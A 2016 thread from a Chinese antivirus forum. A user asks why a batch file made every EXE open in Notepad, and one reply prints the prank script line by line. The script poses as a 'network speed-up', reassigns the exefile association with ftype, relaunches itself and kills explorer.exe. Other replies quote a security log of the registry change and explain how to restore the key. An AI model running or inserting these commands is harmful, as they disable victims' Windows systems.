查看: 3552|回复: 12
收起左侧

[其他相关] 一个批处理文件执行后。能黑360,打开360变成记事本,连浏览器都打不开

[复制链接]
王百万
发表于 2016-9-14 15:54:10 | 显示全部楼层 |阅读模式
一个批处理文件执行后。能黑360,打开360变成记事本,连浏览器都打不开 求会代码的大神解释下为什么

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
fireherman
发表于 2016-9-14 16:14:39 | 显示全部楼层
本帖最后由 fireherman 于 2016-9-14 16:26 编辑

不怕死你就执行.bat
echo 实行网络加速显示“实行网络加速”
ping 127.0.0.1 -n 3 >nul连接本机地址(IP)3次到空文件
echo 加速成功显示“加速成功”
echo 空格键双倍加速显示“空格键双倍加速”
pause暂停,按任意键继续
ftype exefile=notepad.exe把EXE(可执行文件)关联到记事本(文本文件)
echo 你中计啦显示“你中计啦”
start=c.bat运行 c.bat(另外一个批处理文件)
c.bat
star=c.bat(应该是start=c.bat吧?)递归调用(自己调用自己,自己运行自己)
taskkill /f /im explorer.ex强制终止explorer.exe系统文件


这是一个恶作剧的批处理吗?

评分

参与人数 1人气 +1 收起 理由
小小瞻 + 1 感谢解答: )

查看全部评分

zmyx279323199
头像被屏蔽
发表于 2016-9-14 16:50:26 | 显示全部楼层
修改关联文件的
shulun743
发表于 2016-9-14 17:15:34 | 显示全部楼层


这个就是 秘密 ,它将 exe 关联了 记事本

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
vm001
发表于 2016-9-14 18:59:37 | 显示全部楼层
需要右键管理员运行才可以执行

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
skyboybone
发表于 2016-9-14 19:06:21 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
左手
发表于 2016-9-14 21:57:03 | 显示全部楼层
2016-9-14 21:56:27    创建新进程 风险级别:未知    允许
进程: c:\windows\explorer.exe
目标: c:\windows\system32\cmd.exe
命令行: C:\WINDOWS\system32\cmd.exe /c ""C:\Documents and Settings\Administrator\桌面\不怕死你就执行.bat" "
规则: [应用程序]c:\windows\explorer.exe -> [子应用程序]→终止_降权组件 -> [应用程序]c:\windows\system32\cmd.exe

2016-9-14 21:56:28    创建新进程 风险级别:未知    阻止
进程: c:\windows\system32\cmd.exe
目标: c:\windows\system32\conime.exe
命令行: C:\WINDOWS\system32\conime.exe
规则: [应用程序组]→终止_降权组件

2016-9-14 21:56:33    修改注册表值 风险级别:未知    阻止并结束进程
进程: c:\windows\system32\cmd.exe
目标: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command
值: notepad.exe
规则: [应用程序组]→终止_降权组件 -> [注册表]*
王百万
 楼主| 发表于 2016-9-14 23:10:13 | 显示全部楼层
fireherman 发表于 2016-9-14 16:14
这是一个恶作剧的批处理吗?

是的,不过这个有点过了,弄了半天才搞定
王百万
 楼主| 发表于 2016-9-14 23:13:01 | 显示全部楼层
shulun743 发表于 2016-9-14 17:15
这个就是 秘密 ,它将 exe 关联了 记事本

有没有非常简单的方法改回来,而且执行后我的火狐和谷歌浏览器被删除了,什么鬼
fireherman
发表于 2016-9-14 23:24:07 | 显示全部楼层
王百万 发表于 2016-9-14 23:13
有没有非常简单的方法改回来,而且执行后我的火狐和谷歌浏览器被删除了,什么鬼

其实上面的回复里已经给了你启示:

打开注册表(开始 - 运行 - RegEdit)

定位键值
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile\shell\open\command

把键值 notepad.exe 删除,还原为:



如果你只是执行了你主楼里的批处理文件(不怕死你就执行.bat),那么火狐和Chrome浏览器应该是不会被删除的,只不过他们的EXE文件变成打开记事本。

你修改了上面的键值,重启电脑,所有EXE文件都会回来了。

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-14 01:06 , Processed in 0.143524 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表